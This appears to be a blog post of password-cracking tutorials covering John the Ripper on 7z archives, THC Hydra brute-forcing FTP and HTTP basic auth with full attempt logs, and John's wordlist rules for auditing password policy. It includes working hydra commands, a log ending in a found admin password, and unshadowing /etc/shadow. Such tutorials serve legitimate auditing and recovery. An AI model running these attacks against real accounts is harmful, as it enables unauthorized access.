Cracking 7z files Using John The Ripper

7z or 7zip it's a compressed archive format that implements AES-256 encryption.  I have an encrypted compressed archive for which I forgot the password.  I decided to guess it using John The Ripper (JTR).

I needed another tool besides JTR. It's a python script called 7z2john.py by PyLZMA Copyright (C) 2004-2010 Joachim Bauch under the GNU LESSER GENERAL PUBLIC LICENSE.  You can Google it: https://www.google.com.co/#q=7z2john.py or clone the repository through git:

• git clone https://bitbucket.org/dhiru/pylzma-ng.git

To extract the hash of the compressed file just execute the python script:

• ./7z2john.py archive.7z > hash.txt

Finally use the output of the python script as a input file for JTR.

This attack is only possible when you have a few list of words and the certainty that they are correct, because the AES encryption used by 7z implements protection against bruteforce attacks.  It's a extremely slow process, in my laptop 193 passwords took it 8 seconds.

THC Hydra Password Cracker

Hydra is a tool that performs online attacks to guess a valid user & password from a network service.

I've tried it over mysql databases, ftp, http, https, web forms.

There are alternatives like medusa and ncrack, a full online attack may be performed with the three tools, each one can be more successful or faster for every the type of service.

Help and further instructions will be displayed with:

• hydra -h
• hydra -U http-post-form

The -U option shows help and examples, especially for the web form attacks. You will need to know deeply how the web form works to perform a successful attack. Tools like Burp Suite will help to track the requests, headers and responses generated by the login pages.

To perform an unsuccessful attack for a ftp service:

hydra 255.255.255.254 ftp -l ftpuser -P /wordlists/passwords.lst -vV

Only one username (-l option) and file with a list of passwords (-P option) -vV for verbosity and 

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-25 17:44:07
[DATA] max 16 tasks per 1 server, overall 64 tasks, 16 login tries (l:1/p:16), ~0 tries per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "dic" - 1 of 16 [child 0]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "nov" - 2 of 16 [child 1]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "oct" - 3 of 16 [child 2]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "sep" - 4 of 16 [child 3]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "ago" - 5 of 16 [child 4]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "jul" - 6 of 16 [child 5]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "jun" - 7 of 16 [child 6]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "may" - 8 of 16 [child 7]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "abr" - 9 of 16 [child 8]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "mar" - 10 of 16 [child 9]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "feb" - 11 of 16 [child 10]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "ene" - 12 of 16 [child 11]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "mateo" - 13 of 16 [child 13]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "staff" - 14 of 16 [child 6]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "inf" - 15 of 16 [child 12]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "matias" - 16 of 16 [child 15]
[STATUS] attack finished for 255.255.255.254 (waiting for children to complete tests)
[STATUS] 16.00 tries/min, 16 tries in 00:01h, 1 todo in 00:01h, 5 active
[VERBOSE] Retrying connection for child 13
[VERBOSE] Retrying connection for child 12
[VERBOSE] Retrying connection for child 3
[VERBOSE] Retrying connection for child 14
[VERBOSE] Retrying connection for child 15
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-25 17:45:16

The attack failed because a valid pair user-password wasn't found, the option -L could help replacing the single "-l admin" username with a list of usernames (-L usernames.lst)


To perform a successful attack to an http basic authentication service which resides in folder "stats":

hydra 255.255.255.254 http-get -m /stats -l admin -P list.lst -e nsr -vV

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-26 09:38:08
[DATA] max 16 tasks per 1 server, overall 64 tasks, 20 login tries (l:1/p:20), ~0 tries per task
[DATA] attacking service http-get on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] 255.255.255.254 - login "admin" - pass "admin" - 1 of 20 [child 0]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "" - 2 of 20 [child 1]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "nimda" - 3 of 20 [child 2]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "dic" - 4 of 20 [child 3]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "nov" - 5 of 20 [child 4]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "oct" - 6 of 20 [child 5]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "sep" - 7 of 20 [child 6]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "ago" - 8 of 20 [child 7]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "jul" - 9 of 20 [child 8]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "jun" - 10 of 20 [child 9]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "may" - 11 of 20 [child 10]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "abr" - 12 of 20 [child 11]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "mar" - 13 of 20 [child 12]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "feb" - 14 of 20 [child 13]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "ene" - 15 of 20 [child 14]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "Dic.2015" - 16 of 20 [child 15]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "mateo" - 17 of 20 [child 1]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "staff" - 18 of 20 [child 8]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "inf" - 19 of 20 [child 2]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "matias" - 20 of 20 [child 3]
[STATUS] attack finished for prueba.edatel.net.co (waiting for children to complete tests)
[80][http-get] host: 255.255.255.254   login: admin   password: Dic.2015
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-26 09:38:08

The attack tried the null password, login as password and reverse login as password (option -e nsr) and found a valid pair user-password, the quality of the dictionary of words is the key to success,

If you're are not a fan of the command line tools try Xhydra, a graphical front-end to build and customize your attack.

Checking Password Policy With John The Ripper Using --rules

John The Ripper (JTR) is a tool useful to check the strenght of password policy, I've tried on SQL Server databases, Linux passwords, Oracle databases, Windows passwords, etc.

John it's included on some Linux distributions focused on security like Backtrack, Kali or you can get the source code and build it on your system from the official site http://www.openwall.com/john/

My favorite is the dictionary attack. It needs a wordlist file (dictionary) that combined with --rules option gives a plus trying many additional and known combinations, symbols, numbers, concatenations, etc. for every word in the wordlist.

Below there is an example on how work John on Backtrack Linux with a file with 3 hashes md5 (FreeBSD MD5 [32/32]). In my laptop it can test 6141 passwords per second (Depends on the hash type)

/pentest/passwords/john/john-x86-sse2 --wordlist=español.lst --rules shadowmd5

Loaded 3 password hashes with 3 different salts (FreeBSD MD5 [32/32])
guesses: 0  time: 0:00:00:01 0.01% (ETA: Fri Oct 21 23:17:28 2011)  c/s: 6141 
guesses: 0  time: 0:00:00:10 0.10% (ETA: Fri Oct 21 23:17:28 2011)  c/s: 6262  trying: almatriche
guesses: 0  time: 0:00:03:21 3.70% (ETA: Fri Oct 21 22:01:20 2011)  c/s: 6100  trying: Asesoro

Below there is a simple explanation of the inputs for John used in the example:

• shadowmd5: Is a example file taken from the system itself (/etc/shadow), to make able John to read it, first it needs to use the program unshadow that mixes the /etc/passwd and /etc/shadowfiles like this:
  
  unshadow /etc/passwd /etc/shadow > shadowmd5

• --wordlist: Is the file containing the candidate passwords, a sample of a 5 characters upper dictionary looks like:
  
  MARIA
  MONEY
  MONES
  MARLA
  MARLY
  MONIA
  MONIE

• --rules: Is the option that tells John to take every word from the dictionary and mutate it to another words according to the rules existing in the John config file (/etc/john/john.conf) you can also edit the file and put your own rules, but I believe that the default rules are enough to check the password policy.
  
  When you use the option --rules (same as --rules=Wordlist) John will try approximately 52 new passwords based on variations of the word, for the word "crack" John will mutate words like:
  
  Cracks
  cracked
  cracking
  Cracked
  Cracking
  crack5
  crack!
  2crack
  
  John will put numbers 0-9, three symbols ?!. at the beginning and the end of the word, apply english grammar and uppercase and lowercase combinations to guess the password.
  
  
  When you use the option --rules=NT John will try approximately 32 new passwords based on lowercase and uppercase variations in every character that's been used on the word, for the word "crack" John will mutate words like:
  
  crack
  CraCkCrACkCRaCkCRACkcracKcraCKcrAcK
  CRACK
  
  
  When you use the option --rules=Single John will try approximately 836 new passwords based on the same default variations from the --rules option without SECTION specified, but extended with more special characters and bigger numeric combinations, for the word "crack" John will mutate words like:
  
  crack
  ack
  crackm
  crack#
  Crack's
  @crack
  Dr.crack
  Crack99
  crack1900
  crack2019
  
  When you use the option --rules=Extra John will try approximately 4288 new passwords based on lowercase and uppercase variations, combinations with two characters at the beginning and the end of the word and finally numbers from 000 to 999,  for the word "crack" John will mutate words like:
  
  crack
  crackzk
  crack000
  Crack999
  crackdd
  crackzz
  zcrackz
  
  
  When you use the option --rules=Jumbo John will try approximately 5206 new passwords based on the --rules=Wordlist, --rules=NT, --rules=Single, --rules=Extra, this rule it's declared in the /etc/john/john.conf file:
  
  
• #For Wordlist mode and very fast hashes
• [List.Rules:Jumbo]
• .include [List.Rules:Wordlist]
• .include [List.Rules:Single]
• .include [List.Rules:Extra]
  
• .include [List.Rules:NT]


There are some other rules that can replace 1, 2 o 3 characters at the same time, increasing exponentially the number of variations per word, below are the quantity of variations for the word "crack"

o1:3420 passwords
o2:220900 passwords
o3:103823000 passwords

i1:3420 passwords
i2:2030625 passwords
i3:857375000 passwords

i:2034045 passwords
o:224320 passwords
oi:2258365 passwords

The options --rules=Jumbo, --rules=Extra, --rules=Single or the "i" and "o" rules must be used carefully either, with fast hashes or small dictionaries unless you want to wait years for John to finish the attack.

For more examples and documentation visit the official site: http://www.openwall.com/john/doc/